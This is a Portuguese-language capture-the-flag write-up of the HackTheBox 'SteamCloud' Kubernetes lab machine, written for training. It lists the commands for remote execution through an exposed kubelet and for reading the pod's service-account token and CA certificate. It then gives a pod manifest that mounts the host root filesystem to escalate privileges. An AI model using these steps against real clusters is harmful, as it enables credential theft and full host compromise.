SteamCloud

Difficulty: Easy | OS: Linux | Kubernetes

Walkthrough - Youtube Habemus Shell

---

HackTheBox Machine

---

Hack The Boxapp.hackthebox.com

Scanning

---

rustscan -a 10.10.11.133 -u 50000

image.png

Services and Versions

---

sudo nmap -sC -Pn -p 22,8443,10256,10250,10249 -sV 10.10.11.133 -T5

Exploration

---

Port 8443 - HTTPs

---

• Não podemos acessar a raiz do site.

• Vamos realizar um fuzzing:

feroxbuster -u https://10.10.11.133:8443/ -w /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt  -t 200 -x html,php,txt,js,py,pdf,zip -n -k

• Nada de interessante pra gente.

Port 10250 - Kubelet

---

• Podemos interagir então com o kubelet através do utilitário kubeletctl

• Enumerar os pods.

kubeletctl -s 10.10.11.133 pods     

• Temos aqui então apenas namespaces que são criados por padrão. Porém, temos um Pod que está no namespace de default ou seja, não criaram um namespace para segregar ele.

• Vamos verificar quais pods temos permissão de execução remota de código.[RCE]

kubeletctl -s 10.10.11.133 scan rce

• Observe que na coluna RCE temos um + , ou seja, podemos executar comandos remotamente nesses Pods.

• Vamos interagir então com o pod do nginx para confirmar essa vulnerabilidade.

kubeletctl -s 10.10.11.133 exec "id" -p nginx -c nginx -n default

# exec = execução de comandos
# -p = pod
# -c = container
# -n = namespace

• Confirmamos então que podemos executar comandos nesse POD, então podemos ler a nossa primeira flag:

kubeletctl -s 10.10.11.133 exec "cat /root/user.txt" -p nginx -c nginx -n default

Privilege Escalation

---

• Já somos root nesse pod, mas não temos acesso ao volume que esta montada a verdadeira pasta root.

• Então precisamos fazer essa montagem. Podemos criar um novo pod para explorarmos isso.

• Antes disso, precisamos obter um token e um certificado para podermos ver as permissões que temos e para criarmos um novo Pod.

• Normalmente o token fica no caminho:

  • /var/run/secrets/kubernetes.io/serviceaccount/token

• E os certificados ficam em:

  • /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

• Extrair o token:

kubeletctl -s 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx -n default

• Vamos colocar esse token em uma variável de ambiente chamava token:

export token="<token>"

• Obter o certificado:

kubeletctl -s 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx -n default

• Salva ele em um arquivo com o mesmo nome: ca.crt

• Agora podemos usar o utilitário Kubectl para podermos verificar as permissões que temos com esse token no cluster Kubernetes.

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list 

# --token = token que colocamos como variavel de ambiente
# --certifica-authority = o certificado que salvamos como ca.crt
# auth = inspecionar autorização
# can-i = checar se uma ação é permitida
# --list = liste essas permissões

• Observe que no recurso dos Pods, nosso token tem permissão de get, create, list

• Então vamos criar um novo pod de forma declarativa, ou seja, com um arquivo .yaml

• Podemos usar o .yaml de um pod já em execução como modelo, e aqui como não conseguiríamos baixar uma nova imagem para o container, podemos reaproveitar a que já tem no alvo.

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods -o yaml  

• Podemos simplificar bastante esse .ymlpenas colocando o que é necessário para criarmos o pod e montarmos o volume.

apiVersion: v1
kind: Pod
metadata:
  name: exploit-pqd1
  namespace: default
spec:
  containers:
    - name: exploit-pqd-container1
      image: nginx:1.14.2
      volumeMounts:
        - mountPath: /root
          name: volume-montado-no-root
  volumes:
    - name: volume-montado-no-root
      hostPath:
        path: /

• Agora podemos simplesmente criar esse pod de forma declarativa informando o arquivo .yml

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f pqd.yml   

• Refazemos o comando com Kubeletctl para verificarmos se foi criado o nosso pod.

kubeletctl -s 10.10.11.133 pods                                                                             

• Agora podemos executar comandos nesse pod, para tentarmos ler a flag de root final

• Agora conseguimos ver que dentro da pasta de root, temos a pasta verdadeira do root, e listando ela, conseguimos ver a última flag e lê-la.

Pessoal, viram que algumas vezes eu escrevi .yaml e outras .yml , isso foi erro mesmo rsrs.

Mas elas realmente existem, sua diferença é bem sutil e na prática não faz diferença no Kubernetes ou em muitas outras ferramentas.

Bizu é sempre manter a consistência, se começou com .yaml continua usando-a, e vice-versa.

É isso pessoal, vamos juntos sempre aprendendo ! 🥋